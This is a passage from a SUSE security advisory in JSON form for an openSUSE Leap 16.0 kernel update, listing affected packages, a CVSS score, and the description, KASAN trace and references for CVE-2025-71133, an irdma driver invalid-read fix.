"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71132"
},
{
"cve": "CVE-2025-71133",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71133"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/irdma: avoid invalid read in irdma_net_event\n\nirdma_net_event() should not dereference anything from \"neigh\" (alias\n\"ptr\") until it has checked that the event is NETEVENT_NEIGH_UPDATE.\nOther events come with different structures pointed to by \"ptr\" and they\nmay be smaller than struct neighbour.\n\nMove the read of neigh-\u003edev under the NETEVENT_NEIGH_UPDATE case.\n\nThe bug is mostly harmless, but it triggers KASAN on debug kernels:\n\n BUG: KASAN: stack-out-of-bounds in irdma_net_event+0x32e/0x3b0 [irdma]\n Read of size 8 at addr ffffc900075e07f0 by task kworker/27:2/542554\n\n CPU: 27 PID: 542554 Comm: kworker/27:2 Kdump: loaded Not tainted 5.14.0-630.el9.x86_64+debug #1\n Hardware name: [...]\n Workqueue: events rt6_probe_deferred\n Call Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x60/0xb0\n print_address_description.constprop.0+0x2c/0x3f0\n print_report+0xb4/0x270\n kasan_report+0x92/0xc0\n irdma_net_event+0x32e/0x3b0 [irdma]\n notifier_call_chain+0x9e/0x180\n atomic_notifier_call_chain+0x5c/0x110\n rt6_do_redirect+0xb91/0x1080\n tcp_v6_err+0xe9b/0x13e0\n icmpv6_notify+0x2b2/0x630\n ndisc_redirect_rcv+0x328/0x530\n icmpv6_rcv+0xc16/0x1360\n ip6_protocol_deliver_rcu+0xb84/0x12e0\n ip6_input_finish+0x117/0x240\n ip6_input+0xc4/0x370\n ipv6_rcv+0x420/0x7d0\n __netif_receive_skb_one_core+0x118/0x1b0\n process_backlog+0xd1/0x5d0\n __napi_poll.constprop.0+0xa3/0x440\n net_rx_action+0x78a/0xba0\n handle_softirqs+0x2d4/0x9c0\n do_softirq+0xad/0xe0\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71133",
"url": "https://www.suse.com/security/cve/CVE-2025-71133"
},
{
"category": "external",
"summary": "SUSE Bug 1256733 for CVE-2025-71133",
"url": "https://bugzilla.suse.com/1256733"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
